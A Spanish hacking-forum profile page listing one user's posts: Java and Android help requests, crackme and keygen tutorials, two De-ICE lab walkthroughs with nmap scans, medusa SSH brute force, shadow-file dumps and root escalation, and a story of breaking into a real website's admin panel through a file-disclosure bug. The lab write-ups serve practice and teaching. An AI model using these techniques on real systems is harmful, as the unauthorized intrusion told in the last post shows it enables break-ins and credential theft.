elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Temas
Páginas: [1] 2
1  Programación / Java / [Ayuda] Problemas con un juego en java en: 18 Abril 2015, 19:55
Buenas

Estoy comenzando con la programación de juegos en Java (Hasta llegar a Android), pero se me está resistiendo

El problema es que no me muestra el personaje, la Base me da un html, ya importé la imagen... Pero no hay forma de que aparezca el dichoso "dibujo"

He aquí el código:

Clase1:
Código
  1. package juego01;
  2.  
  3. import java.applet.Applet;
  4. import java.awt.Color;
  5. import java.awt.Frame;
  6. import java.awt.Graphics;
  7. import java.awt.Image;
  8. import java.awt.event.KeyEvent;
  9. import java.awt.event.KeyListener;
  10. import java.net.URL;
  11.  
  12. public class juego01 extends Applet implements Runnable, KeyListener {
  13.  
  14. private robot Maquina;
  15. private Image image,jugador;
  16. private Graphics second;
  17. private URL base; //Igual debes ponerle valor... por ahora vale null
  18. //Espera que reviso una cosa rapido¬_
  19.  
  20.    @Override
  21.    public void init() {
  22.  
  23.        setSize(800, 480);
  24.        setBackground(Color.green);
  25.        setFocusable(true);
  26.        addKeyListener(this);
  27.        Frame frame = (Frame) this.getParent().getParent();
  28.        frame.setTitle("Q-Bot Alpha");
  29.        jugador = getImage(base,"Nave.png");
  30.        base=getDocumentBase();
  31.        System.out.println(base);
  32.  
  33.    }
  34.  
  35.    @Override
  36.    public void start() {
  37.     Maquina = new robot();
  38.        Thread thread = new Thread(this);
  39.        thread.start();
  40.    }
  41.  
  42.    @Override
  43.    public void stop() {
  44.        // TODO Auto-generated method stub
  45.    }
  46.  
  47.    @Override
  48.    public void destroy() {
  49.        // TODO Auto-generated method stub
  50.    }
  51.  
  52.    @Override
  53.    public void run() {
  54.        while (true) {
  55.         Maquina.update();
  56.            repaint();
  57.            try {
  58.                Thread.sleep(17);
  59.            } catch (InterruptedException e) {
  60.                e.printStackTrace();
  61.            }
  62.        }
  63.    }
  64.  
  65.    public void update(Graphics g){
  66.     if(image==null){
  67.     image = createImage(this.getWidth(),this.getHeight());
  68.     second = image.getGraphics();
  69.     }
  70.  
  71.     second.setColor(getBackground());
  72.     second.fillRect(0, 0,getWidth(), getHeight());
  73.     second.setColor(getForeground());
  74.     g.drawImage(image,50,50,this);
  75.     paint(second);
  76.    }
  77.  
  78.    public void paint(Graphics g){
  79.     g.drawImage(jugador,Maquina.getPosX(),300,this);
  80.    }
  81.  
  82.    @Override
  83.    public void keyPressed(KeyEvent e) {
  84.  
  85.        switch (e.getKeyCode()) {
  86.        case KeyEvent.VK_UP:
  87.            System.out.println("Move up");
  88.            break;
  89.  
  90.        case KeyEvent.VK_DOWN:
  91.            System.out.println("Move down");
  92.            break;
  93.  
  94.        case KeyEvent.VK_LEFT:
  95.            Maquina.moveLeft();
  96.            break;
  97.  
  98.        case KeyEvent.VK_RIGHT:
  99.            Maquina.moveRight();
  100.            break;
  101.  
  102.        case KeyEvent.VK_SPACE:
  103.            System.out.println("Jump");
  104.            break;
  105.  
  106.        }
  107.  
  108.    }
  109.  
  110.    public void keyReleased(KeyEvent e) {
  111.        switch (e.getKeyCode()) {
  112.        case KeyEvent.VK_UP:
  113.            System.out.println("Stop moving up");
  114.            break;
  115.  
  116.        case KeyEvent.VK_DOWN:
  117.            System.out.println("Stop moving down");
  118.            break;
  119.  
  120.        case KeyEvent.VK_LEFT:
  121.            System.out.println("Stop moving left");
  122.            break;
  123.  
  124.        case KeyEvent.VK_RIGHT:
  125.            System.out.println("Stop moving right");
  126.            break;
  127.  
  128.        case KeyEvent.VK_SPACE:
  129.            System.out.println("Stop jumping");
  130.            break;
  131.  
  132.        }
  133.  
  134.    }
  135.  
  136.    @Override
  137.    public void keyTyped(KeyEvent e) {
  138.        // TODO
  139.  
  140.    }
  141.  
  142. }

Clase 2:
Código
  1. package juego01;
  2.  
  3. public class robot {
  4.  
  5. private int maxX = 640;
  6. private int posX = 0;
  7.  
  8. public void update(){
  9. if(posX >=maxX){
  10. posX = maxX;
  11. }
  12. if(posX <=0){
  13. posX = 0;
  14. }
  15. }
  16.  
  17. public void moveRight(){
  18. posX += 6;
  19. }
  20.  
  21. public void moveLeft(){
  22. posX -= 6;
  23. }
  24.  
  25. public int getPosX(){
  26. return posX;
  27. }
  28.  
  29. public void setPosX(int posX){
  30. this.posX=posX;
  31. }
  32. }

Un saludo, y gracias
2  Programación / Programación General / [Ayuda] Problema con python y Android SDK en: 3 Abril 2015, 16:37
Al intentar ejecutar la instalación del SDK en windows vía consola de Android SDK (Para crear unas cosas para android) obtengo el siguiente error:

Citar
c:\pgs4a-0.9.4>python android.py installsdk

I'm compiling a short test program, to see if you have a working JDK
on your system.

Traceback (most recent call last):
  File "buildlib\install_sdk.py", line 17, in run
    subprocess.check_call(args)
  File "C:\Python27\lib\subprocess.py", line 535, in check_call
    retcode = call(*popenargs, **kwargs)
  File "C:\Python27\lib\subprocess.py", line 522, in call
    return Popen(*popenargs, **kwargs).wait()
  File "C:\Python27\lib\subprocess.py", line 710, in __init__
    errread, errwrite)
  File "C:\Python27\lib\subprocess.py", line 958, in _execute_child
    startupinfo)
WindowsError: [Error 2] El sistema no puede encontrar el archivo especificado

I was unable to use javac to compile a test file. If you haven't
installed the JDK yet, please download it from:

http://www.oracle.com/technetwork/java/javase/downloads/index.html

The JDK is different from the JRE, so it's possible you have Java
without having the JDK.

Without a working JDK, I can't continue.

Tengo java instalado (JDK y JRE), agregados al path del sistema, no comprendo ese error

He probado reinstalado, y con otras versiones de JDK y nada

Un saludo
3  Programación / Ingeniería Inversa / [Reto] Crackme C Yo-Mismo, nivel 1/10 (Principiantes) en: 16 Marzo 2015, 16:42
Hacía tiempo que no programaba nada, asique aquí estoy de nuevo

Descripción: Un crackme hecho en C, creado para los más novatos
Dificultad: 1/10
Plataforma: Windows
Lenguaje: C

Enlace de descarga

Código fuente (Solo si lo has resuelto, o te das por vencido)

Happy coding
4  Programación / Ingeniería Inversa / [Nivel 1/10] CrackMe básico C #4 en: 27 Diciembre 2012, 20:01
Después de un tiempo sin programar alguno, volví con la cuarta versión de la serie de CrackMe's en C.

General:
  • Plataforma: WIN32 (Testado en Win7 x64 y XP x86)
  • Nivel: 1/10 (Ideado para principiantes)
  • Lenguajes: C
  • Tiempo de programación: 35 minutos
  • Protecciones: Ninguna
  • Código fuente: Mensaje privado

Reglas:
  • Reproducir algoritmo en Keygen
  • Solución válida: Keygen y Tutorial
  • No parchear
  • No selfkeygenning
  • No serialfishing

Descargar

Happy Codding

OverSec.cu.cc

Medio saludo.
5  Programación / Ingeniería Inversa / [Tutorial] Selfkeygen Directory Printer 1.8 en: 1 Septiembre 2012, 19:46
Un tute que escribí, ya que hace su tiempo que no publicaba ninguno...

Citar
Método: SelfKeygen (Su propio keygen)
Dificultad: Fácil
Protección: Ninguna
Plataforma: Win32
Demo: Periodo de 30 días.
Cracker: Yo-Mismo
Dedicación: Newbies

Descargar

Dedicación: Jep, Shadowbyte

Un saludo!
6  Programación / Ingeniería Inversa / [Tutorial] Creando Keygen CrackMe Shooter en: 1 Septiembre 2012, 19:45
Un CrackMe que vi por ahí, en CrackMes.de.

Citar
Método: Keygen
Dificultad: 1/10
Protección: Lenguaje de alto nivel, Nombre de ejecutable,  IsDebuggerPressent
Plataforma: Win32
Descarga: Adjunto crackme y keygen
Cracker: Yo-Mismo
Dedicación: Newbies

Dedicación:
Shadowbyte, Jep, Swash, OverSec, CPH, .... Para qué repetirnos

Descargar

Saludos!
7  Seguridad Informática / Bugs y Exploits / [Relato] Entorno controlado de seguridad DE-Ice v1 en: 2 Febrero 2012, 23:21
Esta vez vengo con DE-Ice v1.0.

Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net.

¿Qué necesitaremos?


-Dos máquinas virtuales
-De-ICE v1
-Backtrack 5
-Diccionario de claves comunes inglesas

¿Cuáles serán nuestros objetivos?
-Mapeo de red
-Análisis de red
-Fuerza bruta a servicio
-Fuerza bruta a shadow
-Root

¿Reglas?
-No Exploit

Allá que vamos

Escaneamos las redes para localizar a nuestra presa.

Citar
netdiscover

Currently scanning: 192.168.1.0/16   |   Screen View: ARP Reply                                                                                                       
                                                                                                                                                                       
 1 Captured ARP Reply packets, from 1 hosts.   Total size: 60                                                                                                         
 _____________________________________________________________________________                                                                                         
   IP            At MAC Address      Count  Len   MAC Vendor                                                                                                           
 -----------------------------------------------------------------------------
 192.168.1.100   08:00:27:b1:50:12    01    060   CADMUS COMPUTER SYSTEMS
           

Identificamos servicvios con NMAP:

Citar
root@bt:/# nmap -sV 192.168.1.100

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-02 22:07 CET
Nmap scan report for 192.168.1.100
Host is up (0.0070s latency).
Not shown: 992 filtered ports
PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
443/tcp closed https
MAC Address: 08:00:27:B1:50:12 (Cadmus Computer Systems)
Service Info: Host: slax.example.net; OS: Unix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds

Dejando huella

Vemos que tenemnos varios servicios, excepto uno: FTP. No nos permite conexiones IPv4.
Entramos via HTTP, y nos fijamos que la página nos muestra unos correos. Alteremoslos.

Esto fue lo que obtuve:
Citar
addams
aadams
adaams
damsaa
adamsa
banterb
bbanter
banterb
anterbb
bbanteerbb
coffeec
cooffec
ccoffee
coooffe
cooofef
coofefc
cooffee

Lanzamos medusa tratando de tener suerte.
Citar
medusa -h 192.168.1.100 -U user -P user -M ssh

¡Bingo! Nos encuentra un usuario. Mismo usuario y clave.

Citar
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adamsa (5 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: banterb (6 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: bbanter (7 of 17 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: bbanter Password: bbanter [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: addams (1 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: aadams (2 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adamsa (5 of 17 complete)

Decepción

Accedo vía SSH:
Citar
root@bt:/pentest/passwords/john# ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password:

Pero si tratamos de hacer un cat /etc/shadow, como es lógico, nos dirá que nuestro siguiente comando es:

Citar
exit


Si antes leemos el /etc/passwd, veremos que el usuario aadams se las trae con otros permisos.

Pidiendo auxilio a la medusa

Intentemos con otro diccionario:

Citar
medusa -h 192.168.1.100 -U user -P list.lst -M ssh

Citar
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: fuckyou (578 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: matthew (579 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: miller (560 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: ou82 (561 of 675 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: aadams Password: nostradamus [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: tiger (562 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: trustno1 (563 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: 12345678 (564 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: alex (565 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: windows (566 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: flipper (567 of 675 complete)

Nos muestra el usuario aadams, con su consiguiente clave.

Entramos via SSH, y obtenemos el fichero.

Root Success

Citar
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

aadams@slax:~$

Salimos.
Citar
exit

Crackeamos.
Citar
root@bt:/pentest/passwords/john# ./john --rules --wordlist=list.lst shadow

El resultado se lo dejo a su imaginación, para no estropear el reto, regalando la clave.

Resultado final:
Citar
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ su
Password: *****
root@slax:/home/aadams# whoami
root

root@slax:/home/aadams#

Hasta la próxima.

Dedicación: Oversec, CPH, H-Sec, EH

Saludos
8  Seguridad Informática / Bugs y Exploits / [Relato] Entorno controlado de seguridad DE-Ice v2 en: 2 Febrero 2012, 20:49
Trasteando aburrido, descargué dos sistemas de seguridad controlados para practicar un Test de Intrusión. Estas son DE-ICE v1 y V2 respectivamente.

Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net.

¿Qué necesitaremos?


-Dos máquinas virtuales
-De-ICE v2
-Backtrack 5

¿Cuáles serán nuestros objetivos?
-Webcrawling
-acceder servidor
-Obtener privilegios de ROOT

¿Reglas?
-No Exploit

Empieza la fiesta.

Lo primero que haremos será unir las dos máquinas virtuales. A de-ice se le asigna por defecto la subred 192.168.2.*.

Esto se puede realizar con el siguiente comando:
Código:
ifconfig eth0 192.168.2.150
Siendo 150 una dirección libre, y eth0 su interfaz de red.

Procedamos pues a localizar el servidor.
haremos uso de Netdiscover, o en su defecto, NMAP -sP 192.168.2.*.

Veamos que tenemos por aquí.
Citar
Currently scanning: 192.168.19.0/16 | Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, fro.m 2 hosts. Total size: 120
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.2.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
192.168.2.101 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
Tenemos dos sistemas. Escaneamos con NMAP para obtener resultados.
Citar
nmap -sV 192.168.2.100 - nmap -sV 192.168.2.101
-Primer host:
Citar
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
443/tcp closed https
FTP vulnerable... Pero no utilizaremos exploits, ni para atacar, ni para escalar privilegios.

Vemos que el segundo únicamente tiene el puerto 80. Si accedemos a el via web, no vemos más que unos ficheros. Si accedemos a 192.168.2.100, vemos una página Web. Pincho el enlace y veo direcciones de correo. Está claro: Hay un servicio de correo, por lo que habrán dichos usuarios, "seguramente".

Buscando amigos

Seleccionamos la lista de correo, y la limpiamos de forma que simplemente quede el nombre del usuario, argegando el signo ~ (user) para tratar de brutalizar, haber si encontramos algún directorio de interés.

Ésta es mi lista:
Citar
root
admin
~root
~admin
~pickwick
~winkle
~snodgrass
~tupman
~weller
~tweller
~havisham
~magwitch
~pirrip
~nickleby
~rnickleby
~noggs
~squeers
~pinch
~tapley
~gamp
~marley
~scrooge
~cratchit
~sikes
~dawkins
~claypole
Brutalizamos con DirBuster en 192.168.2.101 y vemos que hay un usuario, pirrip. Tratemos si con un poco de suerte existe la carpeta .ssh.

http://192.168.2.101/~pirrip/.ssh

Ahí tenemos los id_rsa y id_rsa.pub, esperándonos

Lo almacenamos en /root/.ssh/ y damos permisos 777.

Intruder Here

Procedamos a conectar via SSH.
Citar
Tachán! estamos dentro.

You Have New Mail

Entramos y leemos el correo. Hagamos uso de mailx para leer el séptimo correo.
En el vemos:
Citar
root@bt:~# ssh pirrip@192.168.2.100
Linux 2.6.16.
pirrip@slax:~$ mailx
mailx version nail 11.25 7/29/05. Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N 1 Abel Magwitch Sun Jan 13 23:53 20/748 Estella
N 2 Estella Havisham Sun Jan 13 23:53 20/780 welcome to the team
N 3 Abel Magwitch Sun Jan 13 23:53 20/875 havisham
N 4 Estella Havisham Mon Jan 14 00:05 20/861 next month
N 5 Abel Magwitch Mon Jan 14 00:05 20/868 vacation
N 6 Abel Magwitch Mon Jan 14 00:05 20/915 vacation
N 7 noreply@fermion.he Mon Jan 14 00:05 29/983 Fermion Account Login Reminder
? 7
Leemos el correo:
Citar
From noreply@fermion.herot.net Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.

Regards,
Fermion Support


E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st
Tenemos una clave suculenta...

Root Me, Please!

Hagamos uso de una vieja técnica.
Editamos el fichero /etc/shadows, eliminamos el usuario ROOT y sustituimos pirrip por ROOT. De esta forma nos damos privilegios.

Citar
sudo vi /etc/shadow
Ahí ingresaremos la clave que nos facilitó nuestro amigo via mail
Antes:
Citar
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Después:
Citar
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
root:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Guardamos, y tratamos de entrar como superadministrador. Recordemos la clave: 0l1v3rTw1st.

Citar
pirrip@slax:~$ su
Password: ***********
root@slax:/home/pirrip# whoami
root
root@slax:/home/pirrip#
GAME OVER!

Dedicación: 11Sep, [T]rasher, Batista, Exploit-Shell, en fin, a todo OverSec / CPH / H-Sec!

Fuente: Oversec.org (Escrito por mi)

Un saludo
9  Programación / Ingeniería Inversa / [Tutorial] SelfKeygen Crackme 58DD2D69 C.L.S. en: 17 Diciembre 2011, 19:31
Este es un crackme que descargué de la lista de cls, 12/2011.

Descripción:
Citar
This crackme is a simple algorithm.It's written in visual c++ 6.0 with mfc.
Level 1/10

Herramientas:
-OllyDBG

Donde lo descargo
-Aquí

Puesta a punto
Arrancamos con Olly, y buscamos entre las strings:


Vamos al salto al chico bueno y vemos lo siguiente:


Vemos que tenemos 4 strings, una de longitud mínima, serial olvidado, el chico bueno y chico malo.

Nos fijamos que antes pasa por una comparación. Colocamos un BP en dicho CALL, y vemos que se trae entre manos:


Vemos que ahí tenemos el serial falso y verdadero comparándose.

Afilando los dientes

Básicamete lo que haremos, es decirle al programa que de no cumplirse, realice un JMP a una zona vacia del ejecutable, con permisos, donde obtendrá el serial verdadero y lo mostrará.

Creamos un salto a una zona vacía


En ella cargamos los valores, y posteriormente hacemos un salto al CALL.


Vemos que funciona.


Nos vemos!

Guardamos los cambios a otro ejecutable, y probamos. Primero un serial falso y después el verdadero que mostró:


Saludos

EDITO: Próximamente keygen.
10  Seguridad Informática / Nivel Web / Relato de una infiltración, a medias. Full Source Disclousure. en: 6 Diciembre 2011, 14:07
Publicado en Oversec.org, autoría propia.

Citar
Esto es un relato un tanto viejo, al cual dejé pasar un tiempo antes de publicar, por motivos obvios, hasta que el bug fue reparado.

Mientras mi "socio", 11sep y yo buscábamos "juguetitos en línea", encontramos un servidor vulnerable. Esta vez, un FSD.

Igual que el anterior relato, la llamaremos site.com.

Esta página, tenía un script absurdo, que descargaba "ficheros", en la ruta site.com/down.php?f=xxx

Recorrimos la página desde el index hasta topar con los datos de MySQL, al cual accedimos, bajo previa protección.
Llegamos al panel de administración, pero el problema estaba en que se trataba de un hash en SHA1 y MD5, el cual en lugar de brutalizar, cambiamos la clave durante 1 minuto para entrar.

Dentro nos topamos con un sinfín de vulnerabilidades, que si FSD, que si FPD, que si SQLi... Y un lindo uploader :)

No hicimos nada, ya que la web podríamos clonarla, y teniamos la base de datos.
Como en el anterior relato, es mi único objetivo.

Dejamos pasar un tiempo, y volvimos a intentar entrar, para subir una shell. Resulta que habían migrado a un servidor MySQL que no permitía conexiones internas.

Sinceramente me resulta patético buscar scripts por Mr.Google y colgarlos, sin antes saber qué hace... Imaginen si hubieramos subido la shell y rooteado... ¿De qué habría servido migrar el servidor?

Pasamos por alto un sin fín de oportunidades, utilizar el FPD para subir una shell desde SQL, bypassear el uploader, incrustar un PHP en pleno index con la shell...

Nuestro objetivo no fue más que lograr una infiltración al área restringida (Panel de administración)

Como siempre digo, Antes de correr, hay que saber andar.

Un saludo.

Saludos
Páginas: [1] 2
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines